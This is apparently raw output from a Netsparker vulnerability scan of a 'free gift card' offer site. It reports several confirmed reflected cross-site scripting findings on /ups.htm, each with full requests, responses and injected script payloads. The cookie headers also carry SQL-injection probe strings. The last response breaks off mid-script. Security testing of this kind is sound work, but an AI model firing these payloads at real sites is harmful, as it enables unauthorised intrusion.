Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET '"--></style></script><script>alert(0x0001CE)</script>
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CE)%3C/script%3E&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:18 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830ea93517im1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='"--></style></script><script>netsparker(0x0001CE)</script>&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CE)</script>&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CE)</script>&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET '"--></style></script><script>alert(0x0001CF)</script>
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:21 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830ed6a434imo;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='"--></style></script><script>netsparker(0x0001CF)</script>&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CF)</script>&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CF)</script>&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET '"--></style></script><script>alert(0x0001D0)</script>
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D0)%3C/script%3E&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:23 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830f01ac7b643;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<HTML>

<HEAD>
<TITLE>Gift Offer Selection Page</TITLE>
<style type="text/css">
<!--
.18px { font-family: Arial, Helvetica, sans-serif; font-size: 18px}
.12px { font-family: Arial, Helvetica, sans-serif; font-size: 12px}
.10px { font-family: Arial, Helvetica, sans-serif; font-size: 10px}
.9px { font-family: Arial, Helvetica, sans-serif; font-size: 9px}
-->
</style>
<script language="javascript">
function confirmExit()
{
if (x_cmd == 1)
{
return 'Click CANCEL to continue to your gift!';
}
}
window.onbeforeunload=confirmExit;
</script>
<SCRIPT>
<!--
var x_cmd=1;

function x_win(){
if(x_cmd==1){
